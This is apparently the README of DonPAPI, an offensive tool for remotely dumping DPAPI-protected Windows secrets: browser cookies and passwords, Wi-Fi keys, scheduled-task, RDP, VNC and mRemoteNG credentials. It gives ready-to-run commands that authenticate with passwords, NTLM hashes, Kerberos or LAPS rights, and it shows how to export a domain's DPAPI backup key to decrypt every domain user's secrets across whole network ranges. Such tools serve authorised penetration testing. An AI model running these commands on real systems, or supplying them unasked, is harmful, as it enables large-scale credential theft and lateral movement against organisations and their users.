Lots of credentials are protected by DPAPI.
We aim at locating those "secured" credentials, and retrieve them using :
- User Password
- Domaine DPAPI BackupKey
- Local machine DPAPI Key (protecting TaskScheduled blob)
Currently gathered info
- Windows credentials (Taskscheduled credentials & a lot more)
- Windows Vaults
- Windows RDP credentials
- AdConnect (still require a manual operation)
- Wifi key
- Internet explorer Credentials
- Chrome cookies & Credentials
- Firefox cookies & Credentials
- VNC passwords
- mRemoteNG password (with default config)
With a local admin account on a host, we can :
- Gather machine-protected DPAPI secrets
- ScheduledTask that will contain the cleartext login/password of the account configured to run the task
- Wi-Fi passwords
- Extract Masterkey's hash value for every user profile (master keys are protected by the user's password, let's try to crack them with Hashcat)
- Identify who is connected from where in order to identify the admin's personal computers.
- Extract other non-dpapi protected secrets (VNC/Firefox/mRemoteNG)
- Gather protected secrets from IE, Chrome, and Firefox and start reaching the Azure tenant.
With a user password, or the domain PVK we can unprotect the user's DPAPI secrets.Usage
Dump all secrets of the target machine with an admin account :
DonPAPI.py domain/user:[email protected]
Using the user's hash
DonPAPI.py --hashes <LM>:<NT> domain/[email protected]
Using kerberos (-k) and local auth (-local_auth)
DonPAPI.py -k domain/[email protected] DonPAPI.py -local_auth [email protected]
Using a user with LAPS password reading rights
DonPAPI.py -laps domain/user:[email protected]
It is also possible to provide the tool with a list of credentials that will be tested on the target. DonPAPI will try to use them to decipher masterkeys.
This credential file must have the following syntax:
user1:pass1 user2:pass2 ...
DonPAPI.py -credz credz_file.txt domain/user:[email protected]
When a domain admin user is available, it is possible to dump the domain backup key using impacket dpapi.py tool.
dpapi.py backupkeys --export -t domain/user:[email protected]_dc_ip
This backup key (pvk file) can then be used to dump all domain user's secrets!
python DonPAPI.py -pvk domain_backupkey.pvk domain/user:[email protected]_network_list
The target can be an IP, IP range, CIDR, or file containing list targets (one per line)
git clone https://github.com/login-securite/DonPAPI.git cd DonPAPI poetry install poetry run donpapi
git clone https://github.com/login-securite/DonPAPI.git cd DonPAPI python3 -m pip install -r requirements.txt python3 DonPAPI.py